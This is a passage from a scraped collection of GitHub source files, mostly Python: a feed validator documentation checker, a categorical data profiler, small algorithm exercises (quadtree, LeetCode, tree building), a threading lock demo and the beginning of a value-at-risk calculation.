messages\nfrom feedvalidator.logging import Warning, Error\nimport feedvalidator\n\nignoreMissing = [\"warning/RSS20Profile\", \"error/ValidationFailure\"]\n\ntemplate = '''\n\n
\n
\n

%s

\n
\n
\n

XXX

\n
\n
\n

XXX

\n
\n
\n
\n'''\n\nimport inspect\n# Logic from text_html.py\ndef getRootClass(aClass):\n bl = aClass.__bases__\n if not(bl):\n return None\n\n aClass = bl[0]\n bl = bl[0].__bases__\n\n while bl:\n base = bl[0]\n if base == feedvalidator.logging.Message:\n return aClass\n aClass = base\n bl = aClass.__bases__\n return None\n\ndef isclass(x):\n import types\n return inspect.isclass(x) or type(x) == type\n\ndef missing():\n result = []\n\n for n, o in inspect.getmembers(feedvalidator.logging, isclass):\n rc = getRootClass(o)\n if not(rc):\n continue\n\n rcname = rc.__name__.split('.')[-1].lower()\n if rcname in ['warning', 'error']:\n fn = path.join(basename, 'docs', rcname, n + '.html')\n if not(isfile(path.join(basename, fn))) and not rcname + \"/\" + n in ignoreMissing:\n result.append((rcname, n, \"\", fn, fn))\n\n\n for key, value in list(messages.items()):\n if issubclass(key,Error):\n dir = 'error'\n elif issubclass(key,Warning):\n dir = 'warning'\n else:\n continue\n\n html = path.join(basename, 'docs', dir, key.__name__+'.html')\n xml = path.join(basename, 'docs-xml', dir, key.__name__+'.xml')\n\n if not path.exists(xml) or not path.exists(html):\n result.append((dir, key.__name__, value, html, xml))\n\n return result\n\nimport unittest\nclass MissingMessagesTest(unittest.TestCase):\n def test_messages(self):\n self.assertEqual([],\n [\"%s/%s\" % (dir,id) for dir, id, msg, xml, html in missing()], \"Errors/warnings without corresponding documentation\")\n\ndef buildTestSuite():\n suite = unittest.TestSuite()\n loader = unittest.TestLoader()\n suite.addTest(loader.loadTestsFromTestCase(MissingMessagesTest))\n return suite\n\nif __name__ == '__main__':\n import re\n for dir, id, msg, html, xml in missing():\n msg = re.sub(\"%\\(\\w+\\)\\w?\", \"foo\", msg)\n if not path.exists(html):\n pass\n if not path.exists(xml):\n open(xml,'w').write(template.lstrip() % msg)\n print(xml)\n","repo_name":"w3c/feedvalidator","sub_path":"docs-xml/mkmsgs.py","file_name":"mkmsgs.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"21"} +{"seq_id":"22568403601","text":"\"\"\"Contains class for categorical column profiler.\"\"\"\nfrom __future__ import annotations\n\nimport math\nfrom collections import defaultdict\nfrom operator import itemgetter\nfrom typing import cast\n\nimport datasketches\nfrom pandas import DataFrame, Series\n\nfrom .. import dp_logging\nfrom . import profiler_utils\nfrom .base_column_profilers import BaseColumnProfiler\nfrom .profiler_options import CategoricalOptions\n\nlogger = dp_logging.get_child_logger(__name__)\n\n\nclass CategoricalColumn(BaseColumnProfiler[\"CategoricalColumn\"]):\n \"\"\"\n Categorical column profile subclass of BaseColumnProfiler.\n\n Represents a column int the dataset which is a categorical column.\n \"\"\"\n\n type = \"category\"\n\n # If total number of unique values in a column is less than this value,\n # that column is classified as a categorical column.\n _MAXIMUM_UNIQUE_VALUES_TO_CLASSIFY_AS_CATEGORICAL = 10\n\n # Default value that determines if a given col is categorical or not.\n _CATEGORICAL_THRESHOLD_DEFAULT = 0.2\n\n def __init__(self, name: str | None, options: CategoricalOptions = None) -> None:\n \"\"\"\n Initialize column base properties and itself.\n\n :param name: Name of data\n :type name: String\n \"\"\"\n if options and not isinstance(options, CategoricalOptions):\n raise ValueError(\n \"CategoricalColumn parameter 'options' must be of\"\n \" type CategoricalOptions.\"\n )\n super().__init__(name)\n self._categories: dict[str, int] = defaultdict(int)\n self.__calculations: dict = {}\n self._filter_properties_w_options(self.__calculations, options)\n self._top_k_categories: int | None = None\n\n # Conditions to stop categorical profiling\n self.max_sample_size_to_check_stop_condition = None\n self.stop_condition_unique_value_ratio = None\n self._stop_condition_is_met = False\n\n self._stopped_at_unique_ratio: float | None = None\n self._stopped_at_unique_count: int | None = None\n\n self._cms_max_num_heavy_hitters: int | None = 5000\n self.cms_num_hashes: int | None = None\n self.cms_num_buckets: int | None = None\n self.cms: datasketches.countminsketch | None = None\n if options:\n self._top_k_categories = options.top_k_categories\n self.stop_condition_unique_value_ratio = (\n options.stop_condition_unique_value_ratio\n )\n self.max_sample_size_to_check_stop_condition = (\n options.max_sample_size_to_check_stop_condition\n )\n\n if options.cms:\n self._cms_max_num_heavy_hitters = options.cms_max_num_heavy_hitters\n self.cms_num_hashes = datasketches.count_min_sketch.suggest_num_hashes(\n options.cms_confidence\n )\n self.cms_num_buckets = (\n datasketches.count_min_sketch.suggest_num_buckets(\n options.cms_relative_error\n )\n )\n self.cms = datasketches.count_min_sketch(\n self.cms_num_hashes, self.cms_num_buckets\n )\n\n def __add__(self, other: CategoricalColumn) -> CategoricalColumn:\n \"\"\"\n Merge the properties of two CategoricalColumn profiles.\n\n :param self: first profile\n :param other: second profile\n :type self: CategoricalColumn\n :type other: CategoricalColumn\n :return: New CategoricalColumn merged profile\n \"\"\"\n if not isinstance(other, CategoricalColumn):\n raise TypeError(\n \"Unsupported operand type(s) for +: \"\n \"'CategoricalColumn' and '{}'\".format(other.__class__.__name__)\n )\n\n merged_profile = CategoricalColumn(None)\n BaseColumnProfiler._add_helper(merged_profile, self, other)\n\n self._merge_calculations(\n merged_profile.__calculations, self.__calculations, other.__calculations\n )\n\n if self.cms and other.cms:\n\n assert isinstance(self._cms_max_num_heavy_hitters, int)\n assert isinstance(other._cms_max_num_heavy_hitters, int)\n cms_max_num_heavy_hitters: int = min(\n self._cms_max_num_heavy_hitters, other._cms_max_num_heavy_hitters\n )\n\n (\n merged_profile.cms,\n merged_profile._categories,\n merged_profile._cms_max_num_heavy_hitters,\n ) = self._merge_categories_cms(\n self.cms,\n self._categories,\n self.sample_size,\n {},\n other.cms,\n other._categories,\n other.sample_size,\n cms_max_num_heavy_hitters,\n )\n\n elif not self.cms and not other.cms:\n # If both profiles have not met stop condition\n if not (self._stop_condition_is_met or other._stop_condition_is_met):\n merged_profile._categories = profiler_utils.add_nested_dictionaries(\n self._categories, other._categories\n )\n\n # Transfer stop condition variables of 1st profile object to\n # merged profile if they are not None else set to 2nd profile\n profile1_product = self.sample_size * self.unique_ratio\n profile2_product = other.sample_size * other.unique_ratio\n if profile1_product < profile2_product:\n merged_profile.max_sample_size_to_check_stop_condition = (\n self.max_sample_size_to_check_stop_condition\n )\n merged_profile.stop_condition_unique_value_ratio = (\n self.stop_condition_unique_value_ratio\n )\n else:\n merged_profile.stop_condition_unique_value_ratio = (\n other.stop_condition_unique_value_ratio\n )\n merged_profile.max_sample_size_to_check_stop_condition = (\n other.max_sample_size_to_check_stop_condition\n )\n\n # Check merged profile w/ stop condition\n if merged_profile._check_stop_condition_is_met(\n merged_profile.sample_size, merged_profile.unique_ratio\n ):\n merged_profile._stopped_at_unique_ratio = (\n merged_profile.unique_ratio\n )\n merged_profile._stopped_at_unique_count = (\n merged_profile.unique_count\n )\n merged_profile._categories = {}\n merged_profile._stop_condition_is_met = True\n\n else:\n if self.sample_size > other.sample_size:\n merged_profile._stopped_at_unique_ratio = self.unique_ratio\n merged_profile._stopped_at_unique_count = self.unique_count\n merged_profile.sample_size = self.sample_size\n else:\n merged_profile._stopped_at_unique_ratio = other.unique_ratio\n merged_profile._stopped_at_unique_count = other.unique_count\n merged_profile.sample_size = other.sample_size\n\n # If either profile has hit stop condition, remove categories dict\n merged_profile._categories = {}\n merged_profile._stop_condition_is_met = True\n\n else:\n raise Exception(\n \"Unable to add two profiles: One is using count min sketch\"\n \"and the other is using full.\"\n )\n\n return merged_profile\n\n @property\n def gini_impurity(self) -> float | None:\n \"\"\"\n Return Gini Impurity.\n\n Gini Impurity is a way to calculate\n likelihood of an incorrect classification of a new instance of\n a random variable.\n\n G = Σ(i=1; J): P(i) * (1 - P(i)), where i is the category classes.\n We are traversing through categories and calculating with the column\n\n :return: None or Gini Impurity probability\n \"\"\"\n if self.sample_size == 0:\n return None\n gini_sum: float = 0\n for i in self._categories:\n gini_sum += (self._categories[i] / self.sample_size) * (\n 1 - (self._categories[i] / self.sample_size)\n )\n return gini_sum\n\n @property\n def unalikeability(self) -> float | None:\n \"\"\"\n Return Unlikeability.\n\n Unikeability checks for \"how often observations differ from one another\"\n Reference: Perry, M. and Kader, G. Variation as Unalikeability.\n Teaching Statistics, Vol. 27, No. 2 (2005), pp. 58-60.\n\n U = Σ(i=1,n)Σ(j=1,n): (Cij)/(n**2-n)\n Cij = 1 if i!=j, 0 if i=j\n\n :return: None or unlikeability probability\n \"\"\"\n if self.sample_size == 0:\n return None\n elif self.sample_size == 1:\n return 0\n unalike_sum: int = 0\n for category in self._categories:\n unalike_sum += (\n self.sample_size - self._categories[category]\n ) * self._categories[category]\n unalike: float = unalike_sum / (self.sample_size**2 - self.sample_size)\n return unalike\n\n def diff(self, other_profile: CategoricalColumn, options: dict = None) -> dict:\n \"\"\"\n Find the differences for CategoricalColumns.\n\n :param other_profile: profile to find the difference with\n :type other_profile: CategoricalColumn\n :return: the CategoricalColumn differences\n :rtype: dict\n \"\"\"\n # Make sure other_profile's type matches this class\n differences: dict = super().diff(other_profile, options)\n\n differences[\"categorical\"] = profiler_utils.find_diff_of_strings_and_bools(\n self.is_match, other_profile.is_match\n )\n\n differences[\"statistics\"] = dict(\n [\n (\n \"unique_count\",\n profiler_utils.find_diff_of_numbers(\n self.unique_count, other_profile.unique_count\n ),\n ),\n (\n \"unique_ratio\",\n profiler_utils.find_diff_of_numbers(\n self.unique_ratio, other_profile.unique_ratio\n ),\n ),\n ]\n )\n\n # These stats are only diffed if both profiles are categorical\n if self.is_match and other_profile.is_match:\n differences[\"statistics\"][\n \"chi2-test\"\n ] = profiler_utils.perform_chi_squared_test_for_homogeneity(\n self._categories,\n self.sample_size,\n other_profile._categories,\n other_profile.sample_size,\n )\n differences[\"statistics\"][\n \"categories\"\n ] = profiler_utils.find_diff_of_lists_and_sets(\n self.categories, other_profile.categories\n )\n differences[\"statistics\"][\n \"gini_impurity\"\n ] = profiler_utils.find_diff_of_numbers(\n self.gini_impurity, other_profile.gini_impurity\n )\n differences[\"statistics\"][\n \"unalikeability\"\n ] = profiler_utils.find_diff_of_numbers(\n self.unalikeability, other_profile.unalikeability\n )\n cat_count1 = dict(\n sorted(self._categories.items(), key=itemgetter(1), reverse=True)\n )\n cat_count2 = dict(\n sorted(\n other_profile._categories.items(), key=itemgetter(1), reverse=True\n )\n )\n (\n self_cat_count,\n other_cat_count,\n ) = self._preprocess_for_categorical_psi_calculation(\n self_cat_count=cat_count1,\n other_cat_count=cat_count2,\n )\n\n total_psi = 0.0\n for iter_key in self_cat_count.keys():\n percent_self = self_cat_count[iter_key] / self.sample_size\n percent_other = other_cat_count[iter_key] / other_profile.sample_size\n if (percent_other != 0) and (percent_self != 0):\n total_psi += (percent_other - percent_self) * math.log(\n percent_other / percent_self\n )\n differences[\"statistics\"][\"psi\"] = total_psi\n\n differences[\"statistics\"][\n \"categorical_count\"\n ] = profiler_utils.find_diff_of_dicts(self_cat_count, other_cat_count)\n\n return differences\n\n def report(self, remove_disabled_flag: bool = False) -> dict:\n \"\"\"\n Return report.\n\n This is a private abstract method.\n\n :param remove_disabled_flag: flag to determine if disabled\n options should be excluded in the report.\n :type remove_disabled_flag: boolean\n \"\"\"\n return self.profile\n\n @classmethod\n def load_from_dict(cls, data: dict, config: dict | None = None):\n \"\"\"\n Parse attribute from json dictionary into self.\n\n :param data: dictionary with attributes and values.\n :type data: dict[string, Any]\n :param config: config for loading column profiler params from dictionary\n :type config: Dict | None\n\n :return: Profiler with attributes populated.\n :rtype: CategoricalColumn\n \"\"\"\n value = data.pop(\"_categories\")\n profile = super().load_from_dict(data)\n setattr(profile, \"_categories\", defaultdict(int, value))\n return profile\n\n @property\n def profile(self) -> dict:\n \"\"\"\n Return the profile of the column.\n\n For categorical_count, it will display the top k categories most\n frequently occurred in descending order.\n \"\"\"\n profile: dict = dict(\n categorical=self.is_match,\n statistics=dict(\n [\n (\"unique_count\", self.unique_count),\n (\"unique_ratio\", self.unique_ratio),\n ]\n ),\n times=self.times,\n )\n if self.is_match:\n profile[\"statistics\"][\"categories\"] = self.categories\n profile[\"statistics\"][\"gini_impurity\"] = self.gini_impurity\n profile[\"statistics\"][\"unalikeability\"] = self.unalikeability\n profile[\"statistics\"][\"categorical_count\"] = dict(\n sorted(self._categories.items(), key=itemgetter(1), reverse=True)[\n : self._top_k_categories\n ]\n )\n return profile\n\n @property\n def categories(self) -> list[str]:\n \"\"\"Return categories.\"\"\"\n return list(self._categories.keys())\n\n @property\n def categorical_counts(self) -> dict[str, int]:\n \"\"\"Return counts of each category.\"\"\"\n return self._categories.copy()\n\n @property\n def unique_ratio(self) -> float:\n \"\"\"Return ratio of unique categories to sample_size.\"\"\"\n if self._stop_condition_is_met:\n return cast(float, self._stopped_at_unique_ratio)\n\n if self.sample_size:\n return len(self.categories) / self.sample_size\n return 0\n\n @property\n def unique_count(self) -> int:\n \"\"\"Return ratio of unique categories to sample_size.\"\"\"\n if self._stop_condition_is_met:\n return cast(int, self._stopped_at_unique_count)\n\n return len(self.categories)\n\n @property\n def is_match(self) -> bool:\n \"\"\"Return true if column is categorical.\"\"\"\n if self._stop_condition_is_met:\n return False\n\n is_match = False\n unique = len(self._categories)\n if unique <= self._MAXIMUM_UNIQUE_VALUES_TO_CLASSIFY_AS_CATEGORICAL:\n is_match = True\n elif (\n self.sample_size\n and self.unique_ratio <= self._CATEGORICAL_THRESHOLD_DEFAULT\n ):\n is_match = True\n return is_match\n\n def _preprocess_for_categorical_psi_calculation(\n self, self_cat_count, other_cat_count\n ):\n super_set_categories = set(self_cat_count.keys()) | set(other_cat_count.keys())\n if self_cat_count.keys() != other_cat_count.keys():\n logger.info(\n f\"\"\"PSI data pre-processing found that categories between\n the profiles were not equal. Both profiles do not contain\n the following categories {super_set_categories}.\"\"\"\n )\n\n for iter_key in super_set_categories:\n for iter_dictionary in [self_cat_count, other_cat_count]:\n try:\n iter_dictionary[iter_key] = iter_dictionary[iter_key]\n except KeyError:\n iter_dictionary[iter_key] = 0\n return self_cat_count, other_cat_count\n\n def _check_stop_condition_is_met(self, sample_size: int, unqiue_ratio: float):\n \"\"\"Return boolean given stop conditions.\n\n :param sample_size: Number of samples to check the stop condition\n :type sample_size: int\n :param unqiue_ratio: Ratio of unique values to full sample size to\n check stop condition\n :type unqiue_ratio: float\n :return: boolean for stop conditions\n \"\"\"\n if (\n self.max_sample_size_to_check_stop_condition is not None\n and self.stop_condition_unique_value_ratio is not None\n and sample_size >= self.max_sample_size_to_check_stop_condition\n and unqiue_ratio >= self.stop_condition_unique_value_ratio\n ):\n return True\n return False\n\n def _update_stop_condition(self, data: DataFrame):\n \"\"\"Return value stop_condition_is_met given stop conditions.\n\n :param data: Dataframe currently being processed by categorical profiler\n :type data: DataFrame\n :return: boolean for stop conditions\n \"\"\"\n merged_unique_count = len(self._categories)\n merged_sample_size = self.sample_size + len(data)\n merged_unique_ratio = merged_unique_count / merged_sample_size\n\n self._stop_condition_is_met = self._check_stop_condition_is_met(\n merged_sample_size, merged_unique_ratio\n )\n if self._stop_condition_is_met:\n self._stopped_at_unique_ratio = merged_unique_ratio\n self._stopped_at_unique_count = merged_unique_count\n\n @BaseColumnProfiler._timeit(name=\"categories\")\n def _get_categories_cms(self, df_series, len_df):\n \"\"\"Return count min sketch and heavy hitters for both the batch and stream case.\n\n :param df_series: Series currently being processed by categorical profiler\n :type df_series: Series\n :param len_df: the total number of samples iin df_series\n :type len_df: int\n :return: cms, heavy_hitter_dict, missing_heavy_hitter_dict\n \"\"\"\n cms = datasketches.count_min_sketch(self.cms_num_hashes, self.cms_num_buckets)\n heavy_hitter_dict = defaultdict(int)\n missing_heavy_hitter_dict = defaultdict(int)\n for i, value in enumerate(df_series):\n cms.update(value)\n i_count = cms.get_estimate(value)\n i_total_count = i_count + self.cms.get_estimate(value)\n # approximate heavy-hitters\n if i_count >= int(len_df / self._cms_max_num_heavy_hitters):\n heavy_hitter_dict[value] = i_count\n missing_heavy_hitter_dict.pop(value, None)\n elif i_total_count >= int(\n (self.sample_size + len_df) / self._cms_max_num_heavy_hitters\n ):\n missing_heavy_hitter_dict[value] = i_total_count\n heavy_hitter_dict.pop(value, None)\n\n return cms, heavy_hitter_dict, missing_heavy_hitter_dict\n\n @BaseColumnProfiler._timeit(name=\"categories\")\n def _merge_categories_cms(\n self,\n cms1,\n heavy_hitter_dict1,\n len1,\n missing_heavy_hitter_dict,\n cms2,\n heavy_hitter_dict2,\n len2,\n max_num_heavy_hitters,\n ):\n \"\"\"Return the aggregate count min sketch and approximate histogram (categories).\n\n :param cms1: count min sketch\n :type cms1: datasketches.countminsketch\n :param cms2: count min sketch\n :type cms2: datasketches.countminsketch\n :param heavy_hitter_dict1: Heavy Hitters category count\n :type heavy_hitter_dict1: Dict\n :param heavy_hitter_dict2: Heavy Hitters category count\n :type heavy_hitter_dict2: Dict\n :param missing_heavy_hitter_dict: Heavy Hitters category count\n considering two batches are two chunks of a data stream\n :type missing_heavy_hitter_dict: Dict\n :param len1: number of samples in batch 1\n :type len1: int\n :param len2: number of samples in batch 2\n :type len2: int\n :param max_num_heavy_hitters: value used to define\n the threshold for minimum frequency required by a category to be counted\n :type max_num_heavy_hitters: int\n :return: cms1, categories, max_num_heavy_hitters\n \"\"\"\n try:\n cms3 = datasketches.count_min_sketch(\n self.cms_num_hashes, self.cms_num_buckets\n )\n cms3.merge(cms1)\n cms3.merge(cms2)\n except ValueError as err:\n raise err(\n \"\"\"Incompatible sketch configuration. When merging two sketches,\n they must have the same number of buckets and hashes,\n which are defined by cms_confidence and cms_relative_error options,\n respectively.\"\"\"\n )\n\n # re-collecting the estimates of non intersecting categories before\n # re-applying heavy-hitters to the aggregate profile.\n heavy_hitter_dict1 = heavy_hitter_dict1.copy()\n heavy_hitter_dict2 = heavy_hitter_dict2.copy()\n for k in (x for x in heavy_hitter_dict1 if x not in heavy_hitter_dict2):\n heavy_hitter_dict2[k] = cms2.get_estimate(k)\n for k in (x for x in heavy_hitter_dict2 if x not in heavy_hitter_dict1):\n heavy_hitter_dict1[k] = cms1.get_estimate(k)\n\n categories = profiler_utils.add_nested_dictionaries(\n heavy_hitter_dict2, heavy_hitter_dict1\n )\n\n # This is a catch all for edge cases where batch heavy hitters under estimates\n # frequencies compared to treated as a sequence of batches as part of\n # the same stream.\n categories.update(missing_heavy_hitter_dict)\n\n total_samples = len1 + len2\n for cat in list(categories):\n if categories[cat] < (total_samples / max_num_heavy_hitters):\n categories.pop(cat)\n return cms3, categories, max_num_heavy_hitters\n\n def _get_categories_full(self, df_series) -> dict:\n \"\"\"Get the unique counts (categories) of a series.\n\n :param df_series: df series with nulls removed\n :type df_series: pandas.core.series.Series\n :return: dict of counts for each unique value\n :rtype: dict\n \"\"\"\n category_count: dict = df_series.value_counts(dropna=False).to_dict()\n return category_count\n\n @BaseColumnProfiler._timeit(name=\"categories\")\n def _update_categories(\n self,\n df_series: DataFrame,\n prev_dependent_properties: dict = None,\n subset_properties: dict = None,\n ) -> None:\n \"\"\"\n Check whether column corresponds to category type.\n\n Adds category parameters if it is.\n\n :param prev_dependent_properties: Contains all the previous properties\n that the calculations depend on.\n :type prev_dependent_properties: dict\n :param subset_properties: Contains the results of the properties of the\n subset before they are merged into the main data profile.\n :type subset_properties: dict\n :param df_series: Data to be profiled\n :type df_series: pandas.DataFrame\n :return: None\n \"\"\"\n if self.cms is not None:\n if self._cms_max_num_heavy_hitters is None:\n raise ValueError(\n \"when using CMS, cms_max_num_heavy_hitters must be an integer\"\n )\n len_df = len(df_series)\n (\n cms,\n heavy_hitter_dict,\n missing_heavy_hitter_dict,\n ) = self._get_categories_cms(df_series, len_df)\n\n self.cms, self._categories, _ = self._merge_categories_cms(\n cms,\n heavy_hitter_dict,\n len_df,\n missing_heavy_hitter_dict,\n self.cms,\n self._categories,\n self.sample_size,\n self._cms_max_num_heavy_hitters,\n )\n else:\n category_count = self._get_categories_full(df_series)\n self._categories = profiler_utils.add_nested_dictionaries(\n self._categories, category_count\n )\n self._update_stop_condition(df_series)\n if self._stop_condition_is_met:\n self._categories = {}\n\n def _update_helper(self, df_series_clean: Series, profile: dict) -> None:\n \"\"\"\n Update col profile properties with clean dataset and its known profile.\n\n :param df_series_clean: df series with nulls removed\n :type df_series_clean: pandas.core.series.Series\n :param profile: categorical profile dictionary\n :type profile: dict\n :return: None\n \"\"\"\n self._update_column_base_properties(profile)\n\n def update(self, df_series: Series) -> CategoricalColumn:\n \"\"\"\n Update the column profile.\n\n :param df_series: Data to profile.\n :type df_series: pandas.core.series.Series\n :return: updated CategoricalColumn\n :rtype: CategoricalColumn\n \"\"\"\n # If condition for limiting profile calculations\n if len(df_series) == 0 or self._stop_condition_is_met:\n return self\n\n profile = dict(sample_size=len(df_series))\n CategoricalColumn._update_categories(self, df_series)\n BaseColumnProfiler._perform_property_calcs(\n self,\n self.__calculations,\n df_series=df_series,\n prev_dependent_properties={},\n subset_properties=profile,\n )\n\n self._update_helper(df_series, profile)\n\n return self\n","repo_name":"capitalone/DataProfiler","sub_path":"dataprofiler/profilers/categorical_column_profile.py","file_name":"categorical_column_profile.py","file_ext":"py","file_size_in_byte":26742,"program_lang":"python","lang":"en","doc_type":"code","stars":1277,"dataset":"github-code","pt":"21"} +{"seq_id":"4248177430","text":"\r\ncus_current_trans =0\r\ncus_name = input(\"Enter your name :\")\r\ncus_year = input(\"Enter years of Service : \")\r\ncus_current_trans= input(\"Enter your Current Transaction : \")\r\n\r\ncheking = 1000000\r\nnum =int(cheking)\r\n\r\ncus_after_dis_trans = 0\r\nyear= int(cus_year)\r\nconvert = float(cus_current_trans)\r\n\r\n\r\n\r\n\r\nif(year>=10):\r\n if(convert >=num):\r\n cus_after_dis_trans =convert - (float(convert * 0.1))\r\n print(f\"Congratulations {cus_name}, you get 10% discount for transacting over {cus_year} with us. the total discount is {cus_after_dis_trans} \")\r\n else:\r\n print(f\"Sorry {cus_name}, you have only been here for {cus_year} don't get a discount this time\")\r\nelse: print(f\"{cus_name}, you are not qualified for any discount because the requirement is 10 years and above \")","repo_name":"dapcigar/Everything-Python","sub_path":"Conditional Statement/nested if.py","file_name":"nested if.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10450876352","text":"# 1992 쿼드트리\n\nimport sys\ninput = sys.stdin.readline\n\ndef sol (startR,startC,length):\n global answer\n check = Tree[startR][startC]\n for i in range(startR,startR+length):\n for j in range(startC,startC+length):\n if check != Tree[i][j]:\n answer += \"(\"\n sol(startR,startC,length//2)\n sol(startR,startC+length//2,length//2)\n sol(startR+length//2,startC,length//2)\n sol(startR+length//2,startC+length//2,length//2)\n answer += \")\"\n return\n if check == \"1\":\n answer += \"1\"\n else:\n answer += \"0\"\n\n\nif __name__ == \"__main__\":\n size = int(input())\n Tree = [[*(input().strip())] for _ in range(size)]\n answer = \"\"\n sol(0,0,size)\n print(answer)\n","repo_name":"inkyu0103/BOJ","sub_path":"Divide & Conqure/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10076519728","text":"'''\n1304. 和为零的N个唯一整数\n给你一个整数 n,请你返回 任意 一个由 n 个 各不相同 的整数组成的数组,并且这 n 个数相加和为 0 。\n\n\n\n示例 1:\n\n输入:n = 5\n输出:[-7,-1,1,3,4]\n解释:这些数组也是正确的 [-5,-1,1,2,3],[-3,-1,2,-2,4]。\n示例 2:\n\n输入:n = 3\n输出:[-1,0,1]\n示例 3:\n\n输入:n = 1\n输出:[0]\n\n\n提示:\n\n1 <= n <= 1000\n\n1304. Find N Unique Integers Sum up to Zero\nGiven an integer n, return any array containing n unique integers such that they add up to 0.\n\n\n\nExample 1:\n\nInput: n = 5\nOutput: [-7,-1,1,3,4]\nExplanation: These arrays also are accepted [-5,-1,1,2,3] , [-3,-1,2,-2,4].\nExample 2:\n\nInput: n = 3\nOutput: [-1,0,1]\nExample 3:\n\nInput: n = 1\nOutput: [0]\n\n\nConstraints:\n\n1 <= n <= 1000\n'''\n\nclass Solution(object):\n def sumZero(self, n):\n \"\"\"\n :type n: int\n :rtype: List[int]\n \"\"\"\n res = range(-n/2, n/2+1)\n # print(res)\n if n % 2 == 1:\n res.pop(0)\n else:\n res.remove(0)\n return res\n\n# solutions\n\n'''\n方法一:构造\n我们首先将最小的 n - 1 个自然数 0, 1, 2, ..., n - 2 放入数组中,它们的和为 sum。对于剩下的 1 个数,我们可以令其为 -sum,此时这 n 个数的和为 0,并且:\n\n当 n = 1 时,我们构造的答案中只有唯一的 1 个数 0;\n\n当 n > 1 时,我们构造的答案中包含 n - 1 个互不相同的自然数和 1 个负数;\n\n因此这 n 个数互不相同,即我们得到了一个满足要求的数组。\n\nC++Python3\n\nclass Solution:\n def sumZero(self, n: int) -> List[int]:\n ans = [x for x in range(n - 1)]\n ans.append(-sum(ans))\n return ans\n复杂度分析\n\n时间复杂度:O(N)O(N)。\n\n空间复杂度:O(1)O(1),除了存储答案的数组 ans 之外,额外的空间复杂度是 O(1)O(1)。\n\n作者:LeetCode-Solution\n链接:https://leetcode-cn.com/problems/find-n-unique-integers-sum-up-to-zero/solution/he-wei-ling-de-nge-wei-yi-zheng-shu-by-leetcode-so/\n来源:力扣(LeetCode)\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n'''","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/arr/leetcode-1304-FindNUniqueIntegersSumuptoZero.py","file_name":"leetcode-1304-FindNUniqueIntegersSumuptoZero.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35441732334","text":"# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution(object):\r\n def buildTree(self, inorder, postorder):\r\n \"\"\"\r\n :type inorder: List[int]\r\n :type postorder: List[int]\r\n :rtype: TreeNode\r\n \"\"\"\r\n if not inorder:\r\n return None\r\n if len(inorder) == len(postorder) == 1:\r\n return TreeNode(postorder[-1])\r\n nodeVal = postorder[-1]\r\n i = inorder.index(nodeVal)\r\n root = TreeNode(nodeVal)\r\n if i > 0 :\r\n root.left = self.buildTree(inorder[:i], postorder[:i])\r\n if i < len(postorder)-1:\r\n root.right = self.buildTree(inorder[i+1:], postorder[i:-1])\r\n return root","repo_name":"kikihiter/LeetCode2","sub_path":"Medium/No106i.py","file_name":"No106i.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2243180551","text":"#!/usr/bin/env python\n\"\"\"\nConcatinate run-specific csv files\n\"\"\"\n\nimport pandas as pd\nimport os\nfrom os.path import join\n\n\ndef concat(base_dir):\n\n subs = ['sub%03d' % i for i in xrange(1, 34)]\n runs = ['run%03d' % i for i in xrange(1, 12)]\n\n # make an output directory\n if not os.path.exists(join(base_dir, 'concatinated')):\n os.makedirs(join(base_dir, 'concatinated'))\n\n for sub in subs:\n files = [join(base_dir, run, '%s_%s.csv' % (sub, run)) for run in runs]\n df_list = [pd.read_csv(f) for f in files]\n full_df = pd.concat(df_list)\n full_df.reset_index(inplace=True, drop=True)\n outfilename = '%s.csv' % sub\n\n if not os.path.exists(join(base_dir, 'concatinated', outfilename)):\n full_df.to_csv(join(base_dir, 'concatinated', outfilename),\n index_label='idx')\n print('successfully written out file for %s' % sub)\n else:\n print('%s already exists and was not overwritten' % outfilename)\n\n\nif __name__ == '__main__':\n\n concat('/data/famface/openfmri/oli/results/extract_meants/csv')","repo_name":"oliver-contier/famface-temporal-dynamics","sub_path":"tetrad/concatinate_runs.py","file_name":"concatinate_runs.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10122521415","text":"import threading\nimport time\n\nnum = 0\n# 互斥锁\nmutex = threading.Lock()\n\ndef plus1():\n\tglobal num\n\t\n\tfor i in range(100000):\n\t\tmutex.acquire()\n\t\tnum += 1\n\t\tmutex.release()\n\ndef plus2():\n\tglobal num\n\t\n\tfor i in range(100000):\n\t\tmutex.acquire()\n\t\tnum += 1\n\t\tmutex.release()\n\ndef main():\n\tt1 = threading.Thread(target=plus1)\n\tt2 = threading.Thread(target=plus2)\n\n\tt1.start()\n\tt2.start()\n\ttime.sleep(2)\n\tprint(num)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"MrRhine98/python_web","sub_path":"03_thread/thread_03.py","file_name":"thread_03.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33099194250","text":"import numpy\nimport pandas\nimport scipy.stats\n\nfrom src.measures_common import calculate_daily_return_proportioned\n\n\ndef calculate_value_at_risk(asset_total, asset_average, asset_volatility, confidence_interval=0.95):\n \"\"\"\n Calculates the Value at Risk of an a given asset.\n\n Arguments:\n - asset_total: Numeric, absolute value of all assets. \n - asset_average: Numeric, asset average return.\n - asset_volatility: Numeric, asset standard deviation.\n - confidence_lvl (optional): Numeric, confidence level for the VaR calculation. \n Setpoint: 0.95, as used by JPM, GMS, and other IB/HF.\n\n Returns:\n - asset_VaR: Numeric, value at Risk of the asset.\n \"\"\"\n\n # Check if inputs are numeric\n if not all(isinstance(x, (int, float, numpy.number)) for x 